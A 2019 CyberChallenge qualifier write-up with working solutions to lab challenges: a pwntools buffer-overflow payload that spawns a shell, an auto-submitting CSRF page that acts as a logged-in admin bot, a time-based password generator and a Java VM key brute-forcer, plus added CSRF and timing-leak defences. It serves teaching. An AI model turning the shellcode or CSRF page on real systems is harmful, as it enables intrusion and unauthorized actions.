Stranck

CyberChallenge Quals 2019 WRITEUPS

Jun 7th, 2019
/*
NOTICE:
My English is fuckin bad, PLUS I wrote this in like 20 mins. Sorry if I badly fucked up all the grammar :(
Open this page in desktop view to enjoy the ASCII art! :D
██╗     ██╗███╗   ██╗██╗  ██╗███████╗
██║     ██║████╗  ██║██║ ██╔╝██╔════╝
██║     ██║██╔██╗ ██║█████╔╝ ███████╗
██║     ██║██║╚██╗██║██╔═██╗ ╚════██║
███████╗██║██║ ╚████║██║  ██╗███████║
╚══════╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝
Instagram: https://instagram.com/stranck/
Telegram shitpost channel: https://t.me/Stranck
YouTube channel: https://www.youtube.com/channel/UCmMWUz0QZ7WhIBx-1Dz-IGg

██████╗  ██████╗  ██████╗ ██████╗
██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗
██║  ██║██║   ██║██║   ██║██████╔╝
██║  ██║██║   ██║██║   ██║██╔══██╗
██████╔╝╚██████╔╝╚██████╔╝██║  ██║
╚═════╝  ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
CHALL Write-Up
--------------

Lol I executed the command lmao

Attack Payload
--------------

ncat door.quals.cyberchallenge.it 1111

███████╗ ██████╗ ██████╗
██╔════╝██╔═══██╗██╔══██╗
███████╗██║   ██║██████╔╝
╚════██║██║   ██║██╔═══╝
███████║╚██████╔╝██║    
╚══════╝ ╚═════╝ ╚═╝    
CHALL Write-Up
--------------

I downloaded the executable to test it locally, and one of the first things I tried was to get a segmentation fault by inputting a long sequence of characters. It worked. So I opened it in gdb and IDA and started to reverse the code, and I noticed that at the end of the program the execution returns to 0x100100. Using GDB I noticed that the input was placed at 0x1000000: hell yeah, an easy way to do a buffer overflow :D
I tried putting my shellcode payload (to get a shell) at 0x100100 but it didn't work, it seems like it was cutting my input. So at 0x100100 I tried putting a jump to 0x100000 and putting the payload there, but it didn't work because python is a fucking dumbass. Instead I put a fantastic push onto the stack with the address 0x100000 and then a return instruction... It worked! :DD

Attack Payload
--------------
*/
from pwn import *
import sys

# shellcode that spawns a shell; it sits at the start of the input buffer
pl = asm(shellcraft.sh())
# Don't waste A presses. Pannen won't be happy :(
# pad to 0x100 bytes so that "push 0x100000; ret" lands exactly where the
# program returns to (0x100100) and jumps back to the start of the input
s = pl + b'b' * (0x100 - len(pl)) + asm('push 0x100000') + asm('ret')
# raw bytes, not text: write them straight to stdout so they can be piped to ncat
sys.stdout.buffer.write(s + b'\n')

/*
███╗   ██╗███████╗ █████╗          ██████╗ █████╗ ██████╗ ███████╗███████╗██████╗ ███████╗
████╗  ██║██╔════╝██╔══██╗        ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗██╔════╝
██╔██╗ ██║███████╗███████║        ██║     ███████║██████╔╝█████╗  █████╗  ██████╔╝███████╗
██║╚██╗██║╚════██║██╔══██║        ██║     ██╔══██║██╔══██╗██╔══╝  ██╔══╝  ██╔══██╗╚════██║
██║ ╚████║███████║██║  ██║███████╗╚██████╗██║  ██║██║  ██║███████╗███████╗██║  ██║███████║
╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝
CHALL Write-Up
--------------

The first thing I noticed was that the admin wouldn't open any links outside 10.27.x.x
So I thought "What if I host a webserver?"
So I did, using python -m http.server, and checking the logs I saw that 10.27.0.1 was loading the web pages I was hosting. Then I put a redirect in JS to another URL and, checking the logs again, I noticed that the admin requested that page too: this means he was executing the JS code! I tried creating an iFrame to the original page, but obv the XSS detector stopped my JS code from accessing it. Then an idea came into my mind:
I copied the form from the original page into mine, but with the action attribute pointing to the real submit page. Then I wrote some JS code to fill in the form automatically and submit it, assuming that the admin was already logged in. And boom, goteeeeeeeem!

Attack Payload
--------------
*/
<html>
    <body>
        <!-- first attempt: an iframe to the real page; the script below could not
             reach its content, so it stays commented out
        <iframe src="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd?hire=hired!" id="asd">
        </iframe>
        -->
        <!-- copy of the original form, with the action pointing at the real submit page -->
        <form method="POST" action="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd">
            <input type="checkbox" name="hire" value="hired!"> Hire
            <br class="mb-2">
            <input type="submit" value="Submit">
        </form>
        <script>
            /* iframe version, kept for reference: the frame's document is not accessible
            try {
                var frame = document.getElementById("asd");
                var inner = frame.contentDocument || frame.contentWindow.document;
                inner.getElementsByTagName("input")[0].setAttribute("checked", "");
                inner.getElementsByTagName("form")[0].submit();
            } catch (asd) {}
            */
            // tick the checkbox and press submit: the browser posts the form
            // with whatever session the visiting admin already has
            document.getElementsByTagName("input")[0].setAttribute("checked", "");
            document.getElementsByTagName("input")[1].click();
        </script>
    </body>
</html>
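The form above goes through because the application accepts a POST carrying the admin's cookies no matter which page submitted it, and the bot's 10.27.x.x allow-list does not change that, since an attacker page inside that range is still a different origin. As an added example (not part of the write-up or the challenge), here is the server-side admission check that would have rejected it: the request's Origin (or Referer) must be the application's own origin, and the form must carry a per-session token. Only the application origin comes from the page; the header, form and session dicts are constructed.

```python
# Added example: server-side CSRF admission check for the hire/review POST.
# APP_ORIGIN is taken from the page; everything else here is constructed.
import hmac
import secrets
from urllib.parse import urlsplit

APP_ORIGIN = "http://nsacareers.quals.cyberchallenge.it"


def issue_csrf_token(session):
    """Store a fresh per-session token; the real form embeds it as a hidden field."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def source_origin(headers):
    """scheme://host[:port] of the page that sent the request.

    Uses Origin and falls back to Referer; an attacker page at
    http://10.27.5.5:8000 yields that origin, not the app's, and a missing or
    opaque ("null") value yields None, which is treated as cross-site.
    """
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def is_allowed_post(headers, form, session):
    """Accept the POST only if it came from the app's own origin AND the form
    carries the session's CSRF token (compared in constant time)."""
    if source_origin(headers) != APP_ORIGIN:
        return False
    expected = session.get("csrf")
    supplied = form.get("csrf")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)
```

With a SameSite=Lax or Strict session cookie the browser would not even attach the admin's session to the cross-site POST, so the two checks above are a second layer rather than the only one.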

/*
████████╗██╗███╗   ███╗███████╗
╚══██╔══╝██║████╗ ████║██╔════╝
   ██║   ██║██╔████╔██║█████╗  
   ██║   ██║██║╚██╔╝██║██╔══╝  
   ██║   ██║██║ ╚═╝ ██║███████╗
   ╚═╝   ╚═╝╚═╝     ╚═╝╚══════╝
CHALL Write-Up
--------------

I downloaded the two keys and used them to access the server. From it I downloaded the executable (time) and the other file. I ran time and typed in some random strings. It gave me an error. I assumed that the string in the other file was the password, so I typed it in, and this time I didn't get an error, but it was waiting again for a string. Time to reverse! :D
I opened the file in IDA and noticed the "check1" and "check2" functions. I dug inside check2 and noticed that there was a compare between the inputted string and the result of another function: I opened it in the C view, noticing some C standard calls (time & stuff) and a calculation with the different time values. I copied the calculation into a .c file, added some stuff and.... It didn't work, even though it should have. I checked what time it was on the server, noticing that it was in the PDT timezone. After some tries, I changed my PC to that timezone too (changing it directly to PDT doesn't work :C) and... It didn't work either. BUT after a while I executed it again and this time it worked(?????). Probably it was because the time wasn't exactly synchronized.

Attack Payload
--------------
*/
#include <stdio.h>
#include <time.h>

int main(void) {
    time_t rawtime = time(NULL);
    /* localtime() depends on the machine's timezone: the server was in PDT,
       so the box computing the second password has to be in the same zone
       and roughly in sync with the server's clock */
    struct tm *v3 = localtime(&rawtime);
    /* calculation lifted from check2; 3735928559 is 0xDEADBEEF */
    long l = v3->tm_hour + v3->tm_min + (v3->tm_year + v3->tm_mon - v3->tm_mday) / (v3->tm_min + 1) + 3735928559LL;
    /* first line: the password from the other file; second line: the time-based value in octal */
    printf("AoHnikoj7L2fVn41\n%lo\n", l);
    return 0;
}

/*
███████╗███████╗██╗   ██╗███╗   ███╗
██╔════╝╚══███╔╝██║   ██║████╗ ████║
█████╗    ███╔╝ ██║   ██║██╔████╔██║
██╔══╝   ███╔╝  ╚██╗ ██╔╝██║╚██╔╝██║
███████╗███████╗ ╚████╔╝ ██║ ╚═╝ ██║
╚══════╝╚══════╝  ╚═══╝  ╚═╝     ╚═╝

CHALL Write-Up
--------------

TODO

Attack Payload
--------------
*/
package ovh.stranck.cyberchallenge.ezVM;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Scanner;

import ovh.stranck.utils.PatternBruteforcer;

public class Main {

    // Opcodes: one byte each, followed by their operand bytes
    public static final short NOP = 0x00;
    public static final short IN = 0x01;
    public static final short STO = 0x02;
    public static final short ADD = 0x03;
    public static final short SUB = 0x04;
    public static final short NOT = 0x05;
    public static final short AND = 0x06;
    public static final short OR = 0x07;
    public static final short XOR = 0x08;
    public static final short CHK = 0x09;
    public static final boolean PRINT = false;   // trace every instruction

    public static Scanner sc = new Scanner(System.in);
    public static byte[] m = new byte[256];      // VM memory
    public static byte[] p = null;               // VM bytecode
    public static int pc = 0;                    // program counter

    public static String bruteforceRead;         // candidate key fed to IN instead of stdin

    public static void main(String[] args) throws Exception{
        // usage: java ovh.stranck.cyberchallenge.ezVM.Main <path to check_login_key>
        p = Files.readAllBytes(Paths.get(args[0]));
        // pc reached once each 4-char segment of the key has passed its checks;
        // 618 is the end of the program
        int[] pc = {259, 346, 440, 526, 618};
        String[] segment = {"@@@@", "@@@@", "@@@@", "@@@@", "@@@@"};
        bruteforce(pc, segment, 0);
    }

    // Searches one 4-char segment at a time. The VM stops at the first failed CHK,
    // so if it runs past pc[level] the current segment is right and the next one
    // can be searched; execute() == 0 means every check passed.
    public static void bruteforce(int[] pc, String[] segment, int level){
        PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
        String s;
        while(!(s = pbf.next()).equals("")){
            for(int i = 0; i < m.length; i++)
                m[i] = 0;
            Main.pc = 0;

            // already-found segments before the candidate, placeholders after it, joined by '-'
            String before = "", after = "";
            for(int i = 0; i < level; i++){
                before += segment[i] + "-";
            }
            for(int i = level + 1; i < pc.length; i++){
                after += "-" + segment[i];
            }

            bruteforceRead = before + s + after;
            if(execute() == 0){
                System.out.println("FOUND: " + bruteforceRead);
            } else {
                if(Main.pc > pc[level]){
                    if(level + 1 < pc.length){
                        segment[level] = s;
                        bruteforce(pc, segment, level + 1);
                    }
                }
            }
        }
    }

    // Runs the bytecode until the end or the first failed CHK; returns 1 on a failed check
    public static int execute() {
        int ret = 0;
        loop:
        while(pc < p.length){
            if(PRINT) System.out.print(pc + ":\t");
            switch(p[pc++]){
                case NOP: {
                    nop();
                    break;
                }
                case IN: {
                    in();
                    break;
                }
                case STO: {
                    sto();
                    break;
                }
                case ADD: {
                    add();
                    break;
                }
                case SUB: {
                    sub();
                    break;
                }
                case NOT: {
                    not();
                    break;
                }
                case AND: {
                    and();
                    break;
                }
                case OR: {
                    or();
                    break;
                }
                case XOR: {
                    xor();
                    break;
                }
                case CHK: {
                    ret = chk();
                    if(ret == 1) {
                        if(PRINT) System.out.println("Exiting at: " + pc);
                        break loop;
                    }
                    break;
                }
                default: {
                    if(PRINT) System.out.println(p[pc - 1] + ":\tCommand not found");
                }
            }
        }
        return ret;
    }

    public static void nop(){
        if(PRINT) System.out.println("NOP");
    }

    // IN length mem: read `length` bytes into m[mem..]
    public static void in(){
        short length = (short)(p[pc++] & 0xff);
        short mem = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("IN " + length + " " + mem);

        // the real VM reads from stdin (sc.nextLine()); here the candidate key is injected
        String in = bruteforceRead;
        in = in.substring(0, length);
        byte[] b = in.getBytes();
        for(int i = 0; i < b.length; i++)
            m[mem++] = b[i];
    }

    // STO value mem: m[mem] = value
    public static void sto(){
        byte b = p[pc++];
        short mem = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("STO " + (short)(b & 0xff) + " " + mem);

        m[mem] = b;
    }

    // ADD x y z: m[z] = m[x] + m[y]
    public static void add(){
        short x = (short)(p[pc++] & 0xff);
        short y = (short)(p[pc++] & 0xff);
        short z = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("ADD " + x + " " + y + " " + z);

        m[z] = (byte) (m[x] + m[y]);
    }

    // SUB x y z: m[z] = m[x] - m[y]
    public static void sub(){
        short x = (short)(p[pc++] & 0xff);
        short y = (short)(p[pc++] & 0xff);
        short z = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("SUB " + x + " " + y + " " + z);

        m[z] = (byte) (m[x] - m[y]);
    }

    // NOT mem: m[mem] = ~m[mem]
    public static void not(){
        short mem = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("NOT " + mem);

        m[mem] = (byte) ~m[mem];
    }

    // AND x y z: m[z] = m[x] & m[y]
    public static void and(){
        short x = (short)(p[pc++] & 0xff);
        short y = (short)(p[pc++] & 0xff);
        short z = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("AND " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");

        m[z] = (byte) (m[x] & m[y]);
    }

    // OR x y z: m[z] = m[x] | m[y]
    public static void or(){
        short x = (short)(p[pc++] & 0xff);
        short y = (short)(p[pc++] & 0xff);
        short z = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("OR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");

        m[z] = (byte) (m[x] | m[y]);
    }

    // XOR x y z: m[z] = m[x] ^ m[y]
    public static void xor(){
        short x = (short)(p[pc++] & 0xff);
        short y = (short)(p[pc++] & 0xff);
        short z = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("XOR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");

        m[z] = (byte) (m[x] ^ m[y]);
    }

    // CHK x y: 1 (stop) if m[x] != m[y], else 0
    public static int chk(){
        short x = (short)(p[pc++] & 0xff);
        short y = (short)(p[pc++] & 0xff);
        if(PRINT) System.out.println("CHK " + x + " " + y + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");

        if(m[x] != m[y])
            return 1;
        return 0;
    }
}


package ovh.stranck.utils;

// Enumerates every string of the given length over `charset`, one per next() call,
// returning "" once every combination has been produced.
public class PatternBruteforcer {

    private String charset;
    private boolean overflow = false;
    private int index[];
    private int length;

    public PatternBruteforcer(String charset, int length, boolean fixedLength){
        this.charset = charset;
        this.length = length;
        index = new int[length];
        index[0] = -1;
        for(int i = 1; !fixedLength && i < length; i++)
            index[i] = -1;
    }
    public String getCurrent(boolean of){
        String s = "";
        for(int n = 0; !of && n < length; n++)
            if(index[n] >= 0)
                s = charset.charAt(index[n]) + s;
        return s;
    }
    public synchronized String next(){
        if(!this.overflow){
            boolean overflow = true;
            for(int i = 0; i < length && overflow; i++){
                if(++index[i] >= charset.length()){
                    index[i] = 0;
                    overflow = true;
                } else {
                    overflow = false;
                }
            }
            this.overflow = overflow;
        }
        return getCurrent(overflow);
    }
    public boolean isDone(){
        return overflow;
    }

    // Callback-style variant: hands every combination to a.execute(s)
    public static void bruteforceFromCharsetLength(String charset, int length, boolean fixedLength, Action a){
        int[] index = new int[length];
        index[0] = -1;

        for(int i = 1; !fixedLength && i < length; i++)
            index[i] = -1;

        boolean overflow = false;
        while(!overflow){
            overflow = true;

            for(int i = 0; i < length && overflow; i++){

                if(++index[i] >= charset.length()){
                    index[i] = 0;
                    overflow = true;
                } else {
                    overflow = false;

                    String s = "";
                    for(int n = 0; n < length; n++){
                        if(index[n] >= 0)
                            s = charset.charAt(index[n]) + s;
                    }

                    a.execute(s);
                }
            }
        }
    }
}
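The segment-by-segment search in the Java above works because the VM's CHK stops the program at the first mismatch, so the pc at exit reveals how many segments were already right, which turns a 20-char search into five independent 4-char ones. As an added example (not from the paste or the challenge), here is a small Python model of the same opcode layout with two constructed key-check programs: one that checks byte by byte and leaks progress through its exit pc, and one that ORs every (input XOR key) byte into an accumulator and does a single CHK at the end, so every guess exits at the same pc. The key, the programs and the memory layout are constructed here, not taken from check_login_key.

```python
# Added example: a Python model of the EzVM opcode layout used by the Java emulator
# above (opcode byte followed by operand bytes). KEY, the two check programs and the
# memory cells they use are constructed for the demo, not from check_login_key.
NOP, IN, STO, ADD, SUB, NOT, AND, OR, XOR, CHK = range(10)


def run(prog: bytes, user_input: bytes):
    """Execute prog against user_input; return (passed, pc_at_exit)."""
    m = bytearray(256)
    pc = 0
    while pc < len(prog):
        op = prog[pc]
        pc += 1
        if op == IN:                          # IN length mem: copy input into m[mem:]
            length, mem = prog[pc], prog[pc + 1]
            pc += 2
            m[mem:mem + length] = user_input[:length].ljust(length, b"\0")
        elif op == STO:                       # STO val mem: m[mem] = val
            m[prog[pc + 1]] = prog[pc]
            pc += 2
        elif op in (ADD, SUB, AND, OR, XOR):  # op x y z: m[z] = m[x] <op> m[y]
            x, y, z = prog[pc:pc + 3]
            pc += 3
            a, b = m[x], m[y]
            m[z] = {ADD: a + b, SUB: a - b, AND: a & b, OR: a | b, XOR: a ^ b}[op] & 0xff
        elif op == NOT:                       # NOT mem: m[mem] = ~m[mem]
            m[prog[pc]] = ~m[prog[pc]] & 0xff
            pc += 1
        elif op == CHK:                       # CHK x y: stop as soon as m[x] != m[y]
            x, y = prog[pc], prog[pc + 1]
            pc += 2
            if m[x] != m[y]:
                return False, pc
    return True, pc


KEY = b"K3Y!"  # constructed secret for the demo


def fail_fast_program(key: bytes) -> bytes:
    """One CHK per byte: the first wrong byte ends the run, so the exit pc leaks
    how many leading bytes were right (what the segment-wise search exploits)."""
    prog = bytes([IN, len(key), 0])
    for i, k in enumerate(key):
        prog += bytes([STO, k, 16 + i, CHK, i, 16 + i])
    return prog


def accumulate_program(key: bytes) -> bytes:
    """OR every (input XOR key) byte into m[64], then a single CHK against the
    untouched zero cell m[65]: every guess, right or wrong, exits at the same pc."""
    prog = bytes([IN, len(key), 0])
    for i, k in enumerate(key):
        prog += bytes([STO, k, 16 + i, XOR, i, 16 + i, 32 + i, OR, 64, 32 + i, 64])
    return prog + bytes([CHK, 64, 65])


def exit_points(prog: bytes, guesses) -> list:
    """pc at which the VM stopped for each guess; distinct values mean a leak."""
    return [run(prog, g)[1] for g in guesses]
```

For the key above, the byte-by-byte program exits at pc 9, 15, 21 or 27 depending on how many leading bytes of the guess are right, while the accumulating program exits at pc 50 for every guess and only the returned pass/fail flag differs.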